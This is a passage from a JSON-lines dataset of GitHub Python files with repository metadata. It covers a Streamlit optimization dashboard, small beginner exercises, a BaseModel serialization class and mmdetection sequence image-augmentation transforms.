col2.write(str(carB_profit_solution)+ \" Dollars\")\r\n        \r\n        col1.subheader('Number of Cars')\r\n        #col1.bar_chart([carA_solution,carB_solution], width = 1,height=0,use_container_width=True)\r\n        \r\n        x = ['CarA', 'CarB']\r\n        y = [carA_solution, carB_solution]\r\n        fig1 = plt.figure(figsize=(10, 8))\r\n        sns.barplot(x=x, y=y)\r\n        col1.pyplot(fig1)\r\n        \r\n        col2.subheader('Total Profit by Car Type')\r\n        labels = 'CarA Profit', 'CarB Profit'\r\n        profit_solutions = [carA_profit_solution, carB_profit_solution]\r\n        explode = (0, 0.1)\r\n\r\n        fig1, ax1 = plt.subplots()\r\n        ax1.pie(profit_solutions, explode=explode, labels=labels, autopct='%1.1f%%',\r\n                shadow=True, startangle=90)\r\n        ax1.axis('equal')  # Equal aspect ratio ensures that pie is drawn as a circle.\r\n\r\n        col2.pyplot(fig1)\r\n        \r\n        col1.subheader(\"Capacity Allocation Vs. Usage - Assembling\")\r\n        \r\n        x = ['Usage', 'Allocation']\r\n        y = [sum(df_solution[\"Assembly Time\"]), selected_max_capacity_assemblyline]\r\n        fig2 = plt.figure(figsize=(10, 8))\r\n        sns.barplot(x=x, y=y)\r\n        col1.pyplot(fig2)\r\n        \r\n        col2.subheader('Capacity Allocation Vs. Usage - Painting & Finishing')\r\n        \r\n        \r\n        x = ['Usage', 'Allocation']\r\n        y = [sum(df_solution[\"Painting & Finishing Time\"]), selected_max_capacity_paintfinishline]\r\n        fig3 = plt.figure(figsize=(10, 8))\r\n        sns.barplot(x=x, y=y)\r\n        col2.pyplot(fig3)\r\n        \r\n
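        # The two bar charts above compare the hours consumed by the optimal plan\r\n        # against the configured capacity for each production line.\r\n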
        st.markdown(\"\"\"\"\"\", unsafe_allow_html=True)\r\n        st.subheader('Optimum Maximum Profit')\r\n        st.write(str(carA_profit_solution + carB_profit_solution)+ \" Dollars\")\r\n        \r\n    else:\r\n        st.write(\"Please check the model or try a different data set\")\r\n        \r\n        \r\nelse:\r\n    st.write('Click Solve to generate the Production plan')\r\n","repo_name":"suresh-abeyweera/Optimization-with-Python-docplex-Part2","sub_path":"Script.py","file_name":"Script.py","file_ext":"py","file_size_in_byte":7611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"40573160997","text":"import xlrd\n\nbook = xlrd.open_workbook('ClassConcentrations.xlsx')\n\nmajor = input(\"Enter your major: \")\nsheet = book.sheet_by_name(major)\n\nclassName = input(\"Enter class name: \")\n\nfor i in range(sheet.ncols):\n    concentrationName = sheet.cell_value(0,i)\n    for j in range(sheet.nrows):\n        if (sheet.cell_value(j,i) == className):\n            print('distribution requirement: ' + concentrationName)","repo_name":"AlexFeeley/Vandy-ClassFinder","sub_path":"ParseSpreadsheet.py","file_name":"ParseSpreadsheet.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"}
{"seq_id":"20526640691","text":"#\nfrom decimal import Decimal, InvalidOperation\n\nprint(\"The program will add 2 numbers\")\nprint(\"Invalid characters raise an exception\\n\")\nnum_1 = input(\" Enter the first number: \")\nnum_2 = input(\" Enter the second number: \")\n\ntry:\n    # use Decimal for high-precision arithmetic\n    result = Decimal(num_1) + Decimal(num_2)\nexcept (ValueError, InvalidOperation):\n    # catching multiple exceptions: https://www.ycpai.cn/python/mph7ePQH.html\n    print('Invalid input, please enter digits only')\nexcept Exception:\n    print('Overly broad catch of an unknown exception')\nelse:\n    print('The sum is: ' + str(result))\n","repo_name":"ChinaTjcm/hello-python","sub_path":"src/demo/python编程-入门/10-文件和异常/Error_10_3.py","file_name":"Error_10_3.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"23847036984","text":"# quick reference for common os / os.path file operations\n# (snippets only; several calls would fail if run top to bottom)\nimport os\nos.remove(\"tst.txt\")\nos.rename(\"tst.txt\",\"tst2.txt\")\nos.path.exists(\"tst.txt\")\nos.path.getsize(\"tst.txt\")\nos.path.getmtime(\"tst.txt\")\n\nimport datetime\ntimestamp = os.path.getmtime(\"tst.txt\")\ndatetime.datetime.fromtimestamp(timestamp)\n\nos.path.abspath(\"tst.txt\")\nos.path.getmtime(\"tst.txt\")\nprint(os.getcwd())\nos.mkdir(\"new_dir\")\nos.chdir(\"new_dir\")\nos.path.getmtime(\"tst.txt\")\nos.rmdir(\"new_dir\")\nos.listdir(\"new_dir\")\nos.path.join(\"new_dir\",\"tst.txt\")","repo_name":"ahmedtariq01/Automation_with_Python","sub_path":"Python_with_Os/working_with_files.py","file_name":"working_with_files.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"42213880768","text":"#!/usr/bin/python3\n\"\"\"Module with a class\"\"\"\nimport uuid\nfrom datetime import datetime\n\n\nclass BaseModel:\n    \"\"\"\n    Class that defines all common attributes/methods for other classes.\n    \"\"\"\n    # self stands for the instance itself\n\n    def __init__(self, *args, **kwargs):\n        \"\"\"\n        Defines public instance attributes:\n        id: (string) That's assigned a unique id.\n        created_at: (datetime) That's assigned the current datetime\n                    when an instance is created.\n        updated_at: (datetime) That's assigned the current datetime\n                    when an instance is created and it will be updated\n                    every time you change your object.\n        \"\"\"\n        # each key of the kwargs dictionary is an attribute name, except for\n        # __class__ which shouldn't be added as an attribute.\n        # each value of the dict is an attribute value.\n
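        # e.g. kwargs = {'id': '56d43177-...', 'created_at': '2017-09-28T21:03:54.052298',\n        #                'updated_at': '2017-09-28T21:03:54.052302', ...}  (illustrative values)\n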
        if len(kwargs) != 0:\n            for key, value in kwargs.items():\n                # created_at is a str in the kwargs dict, convert it to datetime\n                if key == 'created_at':\n                    if isinstance(value, str):\n                        value = datetime.strptime(\n                            value, '%Y-%m-%dT%H:%M:%S.%f')\n\n                # updated_at is a str in the kwargs dict, convert it to datetime\n                elif key == 'updated_at':\n                    if isinstance(value, str):\n                        value = datetime.strptime(\n                            value, '%Y-%m-%dT%H:%M:%S.%f')\n\n                # skip __class__ so it is not stored as an attribute\n                if key != '__class__':\n                    self.__dict__[key] = value\n\n                # equivalently: if key != '__class__': setattr(self, key, value)\n\n        else:\n            # if no kwargs then generate your own\n            # id should be a str when saved in __dict__; we can not wait until\n            # to_dict() runs for id to become a string :)\n            self.id = str(uuid.uuid4())\n\n            # .now() picks up the current time when the instance is initialised\n\n            self.created_at = datetime.now()\n            self.updated_at = datetime.now()\n\n    def __str__(self):\n        \"\"\"Returns the information about an instance/object like:\n        Class name,\n        Instance id,\n        Dictionary of the attributes of the instance\n        \"\"\"\n\n        # for the name of the class use -> self.__class__.__name__\n        \"\"\"self.__dict__ is a dictionary that stores\n        an instance's writable attributes\"\"\"\n\n        info = \"[{}] ({}) {}\".format(\n            self.__class__.__name__, self.id, self.__dict__)\n        return info\n\n    # Public instance methods:\n\n    def save(self):\n        \"\"\"\n        Updates the public instance attribute updated_at\n        with the current datetime when changes are done.\n        \"\"\"\n\n        self.updated_at = datetime.now()\n\n    def to_dict(self):\n        \"\"\"\n        Generate a dictionary representation of an instance.\n        Returns a dictionary containing all keys/values of __dict__\n        of the instance, plus the class name, created_at and updated_at\n        as string objects in ISO format.\n        \"\"\"\n
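        # Example output (sketch; values are illustrative):\n        #   {'id': '56d43177-...', '__class__': 'BaseModel',\n        #    'created_at': '2017-09-28T21:03:54.052298',\n        #    'updated_at': '2017-09-28T21:03:54.052302'}\n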
\n        dic = {}\n        # we need everything of __dict__ in dic, so copy it (a plain assignment\n        # would alias the instance dict and mutate it below)\n        dic = self.__dict__.copy()\n\n        # then we add the rest of the info\n        # note: keys have to be strings\n        dic['__class__'] = self.__class__.__name__\n\n        # No need to add id because it's in __dict__\n        #dic['id'] = id\n\n        # change created_at & updated_at to ISO format\n\n        created_at = str(self.created_at.isoformat())\n        updated_at = str(self.updated_at.isoformat())\n\n        # add them to dic\n        dic['created_at'] = created_at\n        dic['updated_at'] = updated_at\n\n        return dic\n","repo_name":"rihannas/PetBnB","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"33023358492","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\nfrom numpy import random\n\nsns.distplot([0, 1, 2, 3, 4, 5])\nplt.show()\n\nsns.distplot([0,1,3,5,9], hist=False)\nplt.show()\n\nx = random.normal(size=(2, 3))  # 2x3 array of normally distributed samples\nprint(x)\n\nx = random.normal(loc=1, scale=2, size=(12, 13))","repo_name":"PrakashSewani/Python","sub_path":"Introduction/Basics/NumPySeaborn.py","file_name":"NumPySeaborn.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"31479322875","text":"import copy\nimport mmcv\nimport cv2\nimport numpy as np\nfrom mmdet.core import find_inside_bboxes\nfrom mmdet.datasets.builder import PIPELINES\nfrom mmdet.datasets.pipelines import (MixUp, Mosaic, Normalize, Pad,\n                                      RandomAffine, RandomFlip, Resize,\n                                      YOLOXHSVRandomAug)\nfrom numpy import random\n\n\n@PIPELINES.register_module()\nclass SeqResize(Resize):\n    def __init__(self, share_params=True, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.share_params = share_params\n\n    def __call__(self, results):\n        outs, scale = [], None\n        for i, _results in enumerate(results):\n            if self.share_params and i > 0:\n                _results[\"scale\"] = scale\n            _results = super().__call__(_results)\n            if self.share_params and i == 0:\n                scale = _results[\"scale\"]\n            outs.append(_results)\n        return outs\n\n\n@PIPELINES.register_module()\nclass SeqNormalize(Normalize):\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n\n    def __call__(self, results):\n        outs = []\n        for _results in results:\n            _results = super().__call__(_results)\n            outs.append(_results)\n        return outs\n\n\n@PIPELINES.register_module()\nclass SeqRandomFlip(RandomFlip):\n    def __init__(self, share_params, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self.share_params = share_params\n\n    def __call__(self, results):\n        if self.share_params:\n            if isinstance(self.direction, list):\n                # None means non-flip\n                direction_list = self.direction + [None]\n            else:\n                # None means non-flip\n                direction_list = [self.direction, None]\n\n            if isinstance(self.flip_ratio, list):\n                non_flip_ratio = 1 - sum(self.flip_ratio)\n                flip_ratio_list = self.flip_ratio + [non_flip_ratio]\n            else:\n                non_flip_ratio = 1 - self.flip_ratio\n                # exclude non-flip\n                single_ratio = self.flip_ratio / (len(direction_list) - 1)\n                flip_ratio_list = [single_ratio] * (len(direction_list) - 1) + [\n                    non_flip_ratio\n                ]\n\n            cur_dir = np.random.choice(direction_list, p=flip_ratio_list)\n            flip = cur_dir is not None\n            flip_direction = cur_dir\n\n            for _results in results:\n                _results[\"flip\"] = flip\n                _results[\"flip_direction\"] = flip_direction\n\n        outs = []\n        for _results in results:\n            
_results = super().__call__(_results)\n outs.append(_results)\n return outs\n\n\n@PIPELINES.register_module()\nclass SeqPad(Pad):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def __call__(self, results):\n outs = []\n for _results in results:\n _results = super().__call__(_results)\n outs.append(_results)\n return outs\n\n\n@PIPELINES.register_module()\nclass SeqRandomCrop(object):\n def __init__(\n self,\n crop_size,\n allow_negative_crop=False,\n share_params=False,\n bbox_clip_border=True,\n ):\n assert crop_size[0] > 0 and crop_size[1] > 0\n self.crop_size = crop_size\n self.allow_negative_crop = allow_negative_crop\n self.share_params = share_params\n # The key correspondence from bboxes to labels and masks.\n self.bbox2label = {\n \"gt_bboxes\": [\"gt_labels\", \"gt_instance_ids\"],\n \"gt_bboxes_ignore\": [\"gt_labels_ignore\", \"gt_instance_ids_ignore\"],\n }\n self.bbox2mask = {\n \"gt_bboxes\": \"gt_masks\",\n \"gt_bboxes_ignore\": \"gt_masks_ignore\",\n }\n self.bbox_clip_border = bbox_clip_border\n\n def get_offsets(self, img):\n margin_h = max(img.shape[0] - self.crop_size[0], 0)\n margin_w = max(img.shape[1] - self.crop_size[1], 0)\n offset_h = np.random.randint(0, margin_h + 1)\n offset_w = np.random.randint(0, margin_w + 1)\n return offset_h, offset_w\n\n def random_crop(self, results, offsets=None):\n \"\"\"Call function to randomly crop images, bounding boxes, masks,\n semantic segmentation maps.\n Args:\n results (dict): Result dict from loading pipeline.\n Returns:\n dict: Randomly cropped results, 'img_shape' key in result dict is\n updated according to crop size.\n \"\"\"\n\n for key in results.get(\"img_fields\", [\"img\"]):\n img = results[key]\n if offsets is not None:\n offset_h, offset_w = offsets\n else:\n offset_h, offset_w = self.get_offsets(img)\n results[\"img_info\"][\"crop_offsets\"] = (offset_h, offset_w)\n crop_y1, crop_y2 = offset_h, offset_h + self.crop_size[0]\n crop_x1, crop_x2 = offset_w, offset_w + self.crop_size[1]\n\n # crop the image\n img = img[crop_y1:crop_y2, crop_x1:crop_x2, ...]\n img_shape = img.shape\n results[key] = img\n results[\"img_shape\"] = img_shape\n\n # crop bboxes accordingly and clip to the image boundary\n for key in results.get(\"bbox_fields\", []):\n # e.g. gt_bboxes and gt_bboxes_ignore\n bbox_offset = np.array(\n [offset_w, offset_h, offset_w, offset_h], dtype=np.float32\n )\n bboxes = results[key] - bbox_offset\n if self.bbox_clip_border:\n bboxes[:, 0::2] = np.clip(bboxes[:, 0::2], 0, img_shape[1])\n bboxes[:, 1::2] = np.clip(bboxes[:, 1::2], 0, img_shape[0])\n valid_inds = (bboxes[:, 2] > bboxes[:, 0]) & (bboxes[:, 3] > bboxes[:, 1])\n # If the crop does not contain any gt-bbox area and\n # self.allow_negative_crop is False, skip this image.\n if (\n key == \"gt_bboxes\"\n and not valid_inds.any()\n and not self.allow_negative_crop\n ):\n return None\n results[key] = bboxes[valid_inds, :]\n # label fields. e.g. gt_labels and gt_labels_ignore\n label_keys = self.bbox2label.get(key)\n for label_key in label_keys:\n if label_key in results:\n results[label_key] = results[label_key][valid_inds]\n\n # mask fields, e.g. 
gt_masks and gt_masks_ignore\n mask_key = self.bbox2mask.get(key)\n if mask_key in results:\n results[mask_key] = results[mask_key][valid_inds.nonzero()[0]].crop(\n np.asarray([crop_x1, crop_y1, crop_x2, crop_y2])\n )\n\n # crop semantic seg\n for key in results.get(\"seg_fields\", []):\n results[key] = results[key][crop_y1:crop_y2, crop_x1:crop_x2]\n return results\n\n def __call__(self, results):\n if self.share_params:\n offsets = self.get_offsets(results[0][\"img\"])\n else:\n offsets = None\n\n outs = []\n for _results in results:\n _results = self.random_crop(_results, offsets)\n if _results is None:\n return None\n outs.append(_results)\n\n return outs\n\n\n@PIPELINES.register_module()\nclass SeqPhotoMetricDistortion(object):\n \"\"\"Apply photometric distortion to image sequentially, every transformation\n is applied with a probability of 0.5. The position of random contrast is in\n second or second to last.\n 1. random brightness\n 2. random contrast (mode 0)\n 3. convert color from BGR to HSV\n 4. random saturation\n 5. random hue\n 6. convert color from HSV to BGR\n 7. random contrast (mode 1)\n 8. randomly swap channels\n Args:\n brightness_delta (int): delta of brightness.\n contrast_range (tuple): range of contrast.\n saturation_range (tuple): range of saturation.\n hue_delta (int): delta of hue.\n \"\"\"\n\n def __init__(\n self,\n share_params=True,\n brightness_delta=32,\n contrast_range=(0.5, 1.5),\n saturation_range=(0.5, 1.5),\n hue_delta=18,\n ):\n self.share_params = share_params\n self.brightness_delta = brightness_delta\n self.contrast_lower, self.contrast_upper = contrast_range\n self.saturation_lower, self.saturation_upper = saturation_range\n self.hue_delta = hue_delta\n\n def get_params(self):\n params = dict()\n # delta\n if np.random.randint(2):\n params[\"delta\"] = np.random.uniform(\n -self.brightness_delta, self.brightness_delta\n )\n else:\n params[\"delta\"] = None\n # mode\n mode = np.random.randint(2)\n params[\"contrast_first\"] = True if mode == 1 else 0\n # alpha\n if np.random.randint(2):\n params[\"alpha\"] = np.random.uniform(\n self.contrast_lower, self.contrast_upper\n )\n else:\n params[\"alpha\"] = None\n # saturation\n if np.random.randint(2):\n params[\"saturation\"] = np.random.uniform(\n self.saturation_lower, self.saturation_upper\n )\n else:\n params[\"saturation\"] = None\n # hue\n if np.random.randint(2):\n params[\"hue\"] = np.random.uniform(-self.hue_delta, self.hue_delta)\n else:\n params[\"hue\"] = None\n # swap\n if np.random.randint(2):\n params[\"permutation\"] = np.random.permutation(3)\n else:\n params[\"permutation\"] = None\n return params\n\n def photo_metric_distortion(self, results, params=None):\n \"\"\"Call function to perform photometric distortion on images.\n Args:\n results (dict): Result dict from loading pipeline.\n Returns:\n dict: Result dict with images distorted.\n \"\"\"\n if params is None:\n params = self.get_params()\n results[\"img_info\"][\"color_jitter\"] = params\n\n if \"img_fields\" in results:\n assert results[\"img_fields\"] == [\"img\"], \"Only single img_fields is allowed\"\n img = results[\"img\"]\n assert img.dtype == np.float32, (\n \"PhotoMetricDistortion needs the input image of dtype np.float32,\"\n ' please set \"to_float32=True\" in \"LoadImageFromFile\" pipeline'\n )\n # random brightness\n if params[\"delta\"] is not None:\n img += params[\"delta\"]\n\n # mode == 0 --> do random contrast first\n # mode == 1 --> do random contrast last\n if params[\"contrast_first\"]:\n if 
params[\"alpha\"] is not None:\n img *= params[\"alpha\"]\n\n # convert color from BGR to HSV\n img = mmcv.bgr2hsv(img)\n\n # random saturation\n if params[\"saturation\"] is not None:\n img[..., 1] *= params[\"saturation\"]\n\n # random hue\n if params[\"hue\"] is not None:\n img[..., 0] += params[\"hue\"]\n img[..., 0][img[..., 0] > 360] -= 360\n img[..., 0][img[..., 0] < 0] += 360\n\n # convert color from HSV to BGR\n img = mmcv.hsv2bgr(img)\n\n # random contrast\n if not params[\"contrast_first\"]:\n if params[\"alpha\"] is not None:\n img *= params[\"alpha\"]\n\n # randomly swap channels\n if params[\"permutation\"] is not None:\n img = img[..., params[\"permutation\"]]\n\n results[\"img\"] = img\n return results\n\n def __call__(self, results):\n if self.share_params:\n params = self.get_params()\n else:\n params = None\n\n outs = []\n for _results in results:\n _results = self.photo_metric_distortion(_results, params)\n outs.append(_results)\n\n return outs\n\n def __repr__(self):\n repr_str = self.__class__.__name__\n repr_str += f\"(\\nbrightness_delta={self.brightness_delta},\\n\"\n repr_str += \"contrast_range=\"\n repr_str += f\"{(self.contrast_lower, self.contrast_upper)},\\n\"\n repr_str += \"saturation_range=\"\n repr_str += f\"{(self.saturation_lower, self.saturation_upper)},\\n\"\n repr_str += f\"hue_delta={self.hue_delta})\"\n return repr_str\n\n\n@PIPELINES.register_module()\nclass SeqMosaic(Mosaic):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def __call__(self, results):\n outs = []\n for _results in results:\n _results = self._mosaic_transform(_results)\n outs.append(_results)\n return outs\n\n def _mosaic_transform(self, results):\n \"\"\"Mosaic transform function.\n\n Args:\n results (dict): Result dict.\n\n Returns:\n dict: Updated result dict.\n \"\"\"\n\n assert \"mix_results\" in results\n mosaic_labels = []\n mosaic_bboxes = []\n if len(results[\"img\"].shape) == 3:\n mosaic_img = np.full(\n (int(self.img_scale[0] * 2), int(self.img_scale[1] * 2), 3),\n self.pad_val,\n dtype=results[\"img\"].dtype,\n )\n else:\n mosaic_img = np.full(\n (int(self.img_scale[0] * 2), int(self.img_scale[1] * 2)),\n self.pad_val,\n dtype=results[\"img\"].dtype,\n )\n\n # mosaic center x, y\n center_x = int(random.uniform(*self.center_ratio_range) * self.img_scale[1])\n center_y = int(random.uniform(*self.center_ratio_range) * self.img_scale[0])\n center_position = (center_x, center_y)\n\n loc_strs = (\"top_left\", \"top_right\", \"bottom_left\", \"bottom_right\")\n for i, loc in enumerate(loc_strs):\n if loc == \"top_left\":\n results_patch = copy.deepcopy(results)\n else:\n results_patch = copy.deepcopy(results[\"mix_results\"][i - 1])\n\n img_i = results_patch[\"img\"]\n h_i, w_i = img_i.shape[:2]\n # keep_ratio resize\n scale_ratio_i = min(self.img_scale[0] / h_i, self.img_scale[1] / w_i)\n img_i = mmcv.imresize(\n img_i, (int(w_i * scale_ratio_i), int(h_i * scale_ratio_i))\n )\n\n # compute the combine parameters\n paste_coord, crop_coord = self._mosaic_combine(\n loc, center_position, img_i.shape[:2][::-1]\n )\n x1_p, y1_p, x2_p, y2_p = paste_coord\n x1_c, y1_c, x2_c, y2_c = crop_coord\n\n # crop and paste image\n mosaic_img[y1_p:y2_p, x1_p:x2_p] = img_i[y1_c:y2_c, x1_c:x2_c]\n\n # adjust coordinate\n gt_bboxes_i = results_patch[\"gt_bboxes\"]\n gt_labels_i = results_patch[\"gt_labels\"]\n\n if gt_bboxes_i.shape[0] > 0:\n padw = x1_p - x1_c\n padh = y1_p - y1_c\n gt_bboxes_i[:, 0::2] = scale_ratio_i * gt_bboxes_i[:, 0::2] + padw\n 
gt_bboxes_i[:, 1::2] = scale_ratio_i * gt_bboxes_i[:, 1::2] + padh\n\n mosaic_bboxes.append(gt_bboxes_i)\n mosaic_labels.append(gt_labels_i)\n\n if len(mosaic_labels) > 0:\n mosaic_bboxes = np.concatenate(mosaic_bboxes, 0)\n mosaic_labels = np.concatenate(mosaic_labels, 0)\n mosaic_inds = np.arange(0, len(mosaic_labels))\n\n if self.bbox_clip_border:\n mosaic_bboxes[:, 0::2] = np.clip(\n mosaic_bboxes[:, 0::2], 0, 2 * self.img_scale[1]\n )\n mosaic_bboxes[:, 1::2] = np.clip(\n mosaic_bboxes[:, 1::2], 0, 2 * self.img_scale[0]\n )\n\n if not self.skip_filter:\n mosaic_bboxes, mosaic_labels, mosaic_inds = self._filter_box_candidates(\n mosaic_bboxes, mosaic_labels, mosaic_inds\n )\n\n # remove outside bboxes\n inside_inds = find_inside_bboxes(\n mosaic_bboxes, 2 * self.img_scale[0], 2 * self.img_scale[1]\n )\n mosaic_bboxes = mosaic_bboxes[inside_inds]\n mosaic_labels = mosaic_labels[inside_inds]\n mosaic_inds = mosaic_inds[inside_inds]\n\n results[\"img\"] = mosaic_img\n results[\"img_shape\"] = mosaic_img.shape\n results[\"gt_bboxes\"] = mosaic_bboxes\n results[\"gt_labels\"] = mosaic_labels\n results[\"gt_match_indices\"] = mosaic_inds\n\n return results\n\n def _filter_box_candidates(self, bboxes, labels, inds):\n \"\"\"Filter out bboxes too small after Mosaic.\"\"\"\n bbox_w = bboxes[:, 2] - bboxes[:, 0]\n bbox_h = bboxes[:, 3] - bboxes[:, 1]\n valid_inds = (bbox_w > self.min_bbox_size) & (bbox_h > self.min_bbox_size)\n valid_inds = np.nonzero(valid_inds)[0]\n return bboxes[valid_inds], labels[valid_inds], inds[valid_inds]\n\n\n@PIPELINES.register_module()\nclass SeqRandomAffine(RandomAffine):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def __call__(self, results):\n outs = []\n for _results in results:\n _results = self.random_affine(_results)\n outs.append(_results)\n return outs\n\n def random_affine(self, results):\n img = results[\"img\"]\n height = img.shape[0] + self.border[0] * 2\n width = img.shape[1] + self.border[1] * 2\n\n # Rotation\n rotation_degree = random.uniform(\n -self.max_rotate_degree, self.max_rotate_degree\n )\n rotation_matrix = self._get_rotation_matrix(rotation_degree)\n\n # Scaling\n scaling_ratio = random.uniform(\n self.scaling_ratio_range[0], self.scaling_ratio_range[1]\n )\n scaling_matrix = self._get_scaling_matrix(scaling_ratio)\n\n # Shear\n x_degree = random.uniform(-self.max_shear_degree, self.max_shear_degree)\n y_degree = random.uniform(-self.max_shear_degree, self.max_shear_degree)\n shear_matrix = self._get_shear_matrix(x_degree, y_degree)\n\n # Translation\n trans_x = (\n random.uniform(-self.max_translate_ratio, self.max_translate_ratio) * width\n )\n trans_y = (\n random.uniform(-self.max_translate_ratio, self.max_translate_ratio) * height\n )\n translate_matrix = self._get_translation_matrix(trans_x, trans_y)\n\n warp_matrix = translate_matrix @ shear_matrix @ rotation_matrix @ scaling_matrix\n\n img = cv2.warpPerspective(\n img, warp_matrix, dsize=(width, height), borderValue=self.border_val\n )\n results[\"img\"] = img\n results[\"img_shape\"] = img.shape\n\n for key in results.get(\"bbox_fields\", []):\n bboxes = results[key]\n num_bboxes = len(bboxes)\n if num_bboxes:\n # homogeneous coordinates\n xs = bboxes[:, [0, 0, 2, 2]].reshape(num_bboxes * 4)\n ys = bboxes[:, [1, 3, 3, 1]].reshape(num_bboxes * 4)\n ones = np.ones_like(xs)\n points = np.vstack([xs, ys, ones])\n\n warp_points = warp_matrix @ points\n warp_points = warp_points[:2] / warp_points[2]\n xs = warp_points[0].reshape(num_bboxes, 4)\n ys = 
warp_points[1].reshape(num_bboxes, 4)\n\n warp_bboxes = np.vstack((xs.min(1), ys.min(1), xs.max(1), ys.max(1))).T\n\n if self.bbox_clip_border:\n warp_bboxes[:, [0, 2]] = warp_bboxes[:, [0, 2]].clip(0, width)\n warp_bboxes[:, [1, 3]] = warp_bboxes[:, [1, 3]].clip(0, height)\n\n # remove outside bbox\n valid_index = find_inside_bboxes(warp_bboxes, height, width)\n if not self.skip_filter:\n # filter bboxes\n filter_index = self.filter_gt_bboxes(\n bboxes * scaling_ratio, warp_bboxes\n )\n valid_index = valid_index & filter_index\n\n results[key] = warp_bboxes[valid_index]\n if key in [\"gt_bboxes\"]:\n if \"gt_labels\" in results:\n results[\"gt_labels\"] = results[\"gt_labels\"][valid_index]\n results[\"gt_match_indices\"] = results[\"gt_match_indices\"][\n valid_index\n ]\n\n if \"gt_masks\" in results:\n raise NotImplementedError(\"RandomAffine only supports bbox.\")\n return results\n\n\n@PIPELINES.register_module()\nclass SeqMixUp(MixUp):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def __call__(self, results):\n outs = []\n for _results in results:\n _results = self._mixup_transform(_results)\n outs.append(_results)\n return outs\n\n def _mixup_transform(self, results):\n \"\"\"MixUp transform function.\n\n Args:\n results (dict): Result dict.\n\n Returns:\n dict: Updated result dict.\n \"\"\"\n\n assert \"mix_results\" in results\n assert len(results[\"mix_results\"]) == 1, \"MixUp only support 2 images now !\"\n\n if results[\"mix_results\"][0][\"gt_bboxes\"].shape[0] == 0:\n # empty bbox\n return results\n\n retrieve_results = results[\"mix_results\"][0]\n retrieve_img = retrieve_results[\"img\"]\n\n jit_factor = random.uniform(*self.ratio_range)\n is_filp = random.uniform(0, 1) > self.flip_ratio\n\n if len(retrieve_img.shape) == 3:\n out_img = (\n np.ones(\n (self.dynamic_scale[0], self.dynamic_scale[1], 3),\n dtype=retrieve_img.dtype,\n )\n * self.pad_val\n )\n else:\n out_img = (\n np.ones(self.dynamic_scale, dtype=retrieve_img.dtype) * self.pad_val\n )\n\n # 1. keep_ratio resize\n scale_ratio = min(\n self.dynamic_scale[0] / retrieve_img.shape[0],\n self.dynamic_scale[1] / retrieve_img.shape[1],\n )\n retrieve_img = mmcv.imresize(\n retrieve_img,\n (\n int(retrieve_img.shape[1] * scale_ratio),\n int(retrieve_img.shape[0] * scale_ratio),\n ),\n )\n\n # 2. paste\n out_img[: retrieve_img.shape[0], : retrieve_img.shape[1]] = retrieve_img\n\n # 3. scale jit\n scale_ratio *= jit_factor\n out_img = mmcv.imresize(\n out_img,\n (int(out_img.shape[1] * jit_factor), int(out_img.shape[0] * jit_factor)),\n )\n\n # 4. flip\n if is_filp:\n out_img = out_img[:, ::-1, :]\n\n # 5. random crop\n ori_img = results[\"img\"]\n origin_h, origin_w = out_img.shape[:2]\n target_h, target_w = ori_img.shape[:2]\n padded_img = np.zeros(\n (max(origin_h, target_h), max(origin_w, target_w), 3)\n ).astype(np.uint8)\n padded_img[:origin_h, :origin_w] = out_img\n\n x_offset, y_offset = 0, 0\n if padded_img.shape[0] > target_h:\n y_offset = random.randint(0, padded_img.shape[0] - target_h)\n if padded_img.shape[1] > target_w:\n x_offset = random.randint(0, padded_img.shape[1] - target_w)\n padded_cropped_img = padded_img[\n y_offset : y_offset + target_h, x_offset : x_offset + target_w\n ]\n\n # 6. 
adjust bbox\n retrieve_gt_bboxes = retrieve_results[\"gt_bboxes\"]\n retrieve_gt_bboxes[:, 0::2] = retrieve_gt_bboxes[:, 0::2] * scale_ratio\n retrieve_gt_bboxes[:, 1::2] = retrieve_gt_bboxes[:, 1::2] * scale_ratio\n if self.bbox_clip_border:\n retrieve_gt_bboxes[:, 0::2] = np.clip(\n retrieve_gt_bboxes[:, 0::2], 0, origin_w\n )\n retrieve_gt_bboxes[:, 1::2] = np.clip(\n retrieve_gt_bboxes[:, 1::2], 0, origin_h\n )\n\n if is_filp:\n retrieve_gt_bboxes[:, 0::2] = (\n origin_w - retrieve_gt_bboxes[:, 0::2][:, ::-1]\n )\n\n # 7. filter\n cp_retrieve_gt_bboxes = retrieve_gt_bboxes.copy()\n cp_retrieve_gt_bboxes[:, 0::2] = cp_retrieve_gt_bboxes[:, 0::2] - x_offset\n cp_retrieve_gt_bboxes[:, 1::2] = cp_retrieve_gt_bboxes[:, 1::2] - y_offset\n if self.bbox_clip_border:\n cp_retrieve_gt_bboxes[:, 0::2] = np.clip(\n cp_retrieve_gt_bboxes[:, 0::2], 0, target_w\n )\n cp_retrieve_gt_bboxes[:, 1::2] = np.clip(\n cp_retrieve_gt_bboxes[:, 1::2], 0, target_h\n )\n\n # 8. mix up\n ori_img = ori_img.astype(np.float32)\n mixup_img = 0.5 * ori_img + 0.5 * padded_cropped_img.astype(np.float32)\n\n retrieve_gt_labels = retrieve_results[\"gt_labels\"]\n retrieve_gt_match_indices = retrieve_results[\"gt_match_indices\"] + 999\n if not self.skip_filter:\n keep_list = self._filter_box_candidates(\n retrieve_gt_bboxes.T, cp_retrieve_gt_bboxes.T\n )\n\n retrieve_gt_labels = 